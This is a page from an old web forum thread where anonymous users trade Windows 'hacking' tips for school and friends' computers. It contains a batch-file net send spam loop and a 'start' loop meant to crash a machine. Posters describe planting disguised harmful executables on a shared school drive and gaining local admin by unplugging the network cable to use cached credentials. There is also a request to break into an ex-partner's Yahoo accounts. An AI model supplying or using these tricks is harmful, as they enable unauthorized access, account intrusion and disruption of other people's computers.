monit
+ Reply to Thread
Page 3 of 4 FirstFirst 1234 LastLast

Thread: Net Send DOS Help!

Unregistered Guest

Talking www.google.com ( search zonfire )

Search Zonfire on google. this maybe is old site but the hacks works

it contains item editor / Stat editor / skills and Mutch more

Extra speed
    Twice mutch hp
    Combinated attacks whit swords

Unreg BEKAH Guest

Can Someone Help Me Get Into A Yahoo Im Or Profile?

I AM TRYING TO HACK MY EX FIANCE S ACCTS. THIS GUY HAS TOTALLY LIED TO ME- EVEN TELLING ME HE HAS PROSTATE CANCER- SO YOU KNOW,,,,,

AFTER I REFUSED TO SIGN FOR A 40K VEHICLE FOR HIM WHILE ON DISABILITY HE WALKED OUT ON ME. I HIRED A PI IN CANADA WHERE HES FROM AND THEY CANT FIND ANYTHING ON HIM EITHER, I AM FACING OWING A COUPLE HUNDRED DOLLARS FOR THIS GUYS BILLS- HE TURNED HIS PHONE OFF 2 DAYS AGO AND REFUSES TO TALK TO ME.

PLSE HELP ME FIND THE TRUTH-

PLSE EMAIL ME AT [email]SAPHIREZDREM@NETZERO.COM[/email] IF YOU CAN HELP ME.

Unregistered Guest

beginner hacker

okay... i have my friends IP address. i'm looking for some funny, but overall harmless things to pull on him. i'm still learning the command deal, but could figure out something if someone could give me some good ideas. is there a way to send a popup window with a message to his computer, or to directly shutdown his computer? we do not share a network. all i have is his IP addy. what can i do. i have to get back at him for a prank he pulled on me a while back. give me some command ideas please.

Unregistered Guest
    Quote Originally Posted by Unregistered
    hey i need some help on somethin off subject, i need to no how to root login on a windows XP i used to no how to do it on this old shit computer at my friends house but it is much dif. with a XP and now my parents say i put to much time into halo and forums on the net so they put a password i dont fuckin no!!
    So plz tell me and email me all the command shit u no at [email]mattacabaca@**********[/email]
    please email me, dont post it............hi
    i dont know?

Unregistered Guest

You're are FUCKING dumbass. Please remember that 'no' and 'know' are two different words and can't be used as eachother. Also be aware of this little fellow I call a 'period'.. and NO I'm not talking about the thing your sister has. It's the small dot that lets people KNOW when it's ok to stop.

Unregistered Guest
    Hi can you email me if someone tells you ? [email]gevaavishai@**********[/email] i can get you a gmail invite if you want one.

Unregistered Guest

hey what are programs to hack?what is the best one? i heard about flash XP or XP falsh. i don't know what its called. can you email me at [email]gevaavishai@**********[/email] who ever helps me can get a gmail invite!! lol but i can really get you one!

Keke Guest

Talking

Quote Originally Posted by Unregistered
    Ok so at my school the computers are Windows 2000 Professional. And they uses Novell (common). Anyways the cool thing at school right now is to send other people on computers messages using net send. (Example) While im on a computer a message will pop up saying "Turn off your computer now and kiss your butt!" or something stupid like that.

I've figured out how to do this its: net send CW-**0*6 "Your message here"

*Every computer has there own 4 digit number, and they are posted on top the computers monitor. You do not include the * when doing net send.

Ok so now I wanna do something cooler =) Something maybe like shutting down someones computer. Or anything that is cooler then the net send.

Also you can not get into DOS mode here at school, when I try go to run>cmd DOS will pop up and in it, it says The Admistrator has disabled this, press any key to exit. So the way we do net send at school is to make batch files.

Any help??

PS: I already tried shutdown CW-*048 -t *0 I made it as a .bat file, but it didnt work, DOS would open up for like 2 secs then close.. And it said somehting about it not being reconized as an internal or external command.
    can u send a bomb batch file??

With batch files, the user needs to open them and yes you can send one that will open, delete and basically jam the computer. I made programs that did this in Visual Basic and put them on the networked drive that everyone has access to. I then renamed them to stuff like Jezzball.exe and changed the icon to be the Jezz Ball icon. It was funny becasue I'd see people get pissed off and slam on the key***rd when they opened one.

Also I made a batch file that shuts down the local computer. That also was hilarious because there was no timeout and the compuetr's power just cut out.

For the Net Send command, if anybody cares still, type this into command propmtp before you use the net send command. "net start Messenger"

You need the messenger to be opened and operable on both the trasmitting and the recieveing computer for the command to work.

To get command prompt to work on your school computer, you need local admin privliges if the admin disabled it. The Admin really did a good job, but not good enough , with the security on our network. To get the local privliges, if you are running on windows 2k, unplug the ethernet cable on a computer that you frequently use and log in. The computer will have your password hash already stored, so you will get access. If you plug the cable back in, you can then get internet and download and install Firefox or Opera to use instead of the heavily filtered and faulted IE. With the local admin privliges you can then run Commadn Prompt.

Koryo Guest

O please help me

Ok im new at hacking and really want to learn, have tried to hack the schools PC but OMG THE ADMIN IS SO TIGHT. we are using XP with RM on it. unfortunatly i am unable to access dos or command prompt, the only thing available to me is notepad. i really want to be able to use netsend or even better, become an admin for a timed * hour and not have my ADMIN see it. he uses some kind of monitering program to ***** all the people who become admin and deletes there account after putting all there work on disk (as i said this admin is tight). i would be fine if i could just use Setsend thro notepad creating a .bat file but i dont know anything about programing, please someone give me the code (or even better mail me instructions on how to program in .bat format)

O and about being admin, if you have any ideas that would be great and id love to try it. Thanx

Koryo

koryo Guest
    my email is [email]koryosanders@hotmail.com[/email]

thanx again

Unregistered Guest

Thumbs up Batch file for starting command prompt

Heres an awesome batch file to send as a prank. It's a net send loop, so everytime they click OK another message comes up AGAIN!!! It's pretty awesome.

:top
    net send <comp name> <message>
    goto top

Also, another cool batch file that will potentially crash a computer is this:

:top
    start
    goto top

^^^May sound simple, but will open hundreds of command prompt window within seconds.

By the way, you can just make a batch file saying "start" and it will open a command prompt. (don't be an idiot...of course you remove the quotes)

For those of you who are idiots, you can run any DOS command by just typing the commands in a text editor, saving the file as a .bat (batch file), and double clicking the file. Its that simple.

Happy spamming...etc....

Unregistered Guest
    does anyone have a program that you can use to send a net send but spoof the from field? i had one ages ago but lost it.

Unregistered Guest
    on our last day at school we made a .bat file that would send a message to all the pc's saying 'network admins have small willies'...we put it on a floppy and wrote game on it. Someone actually picked it up and ran it....lol it was so funny and the admins diddnt know what had happend

Remote execution

I am farmilliar with net send but I have no idea how to shut down another persons comp from the command line and when i try to remotely execute code using psexec.exe I get and error, it tries to connect and then it says to make sure that the admin share is enabled on their pc

+ Reply to Thread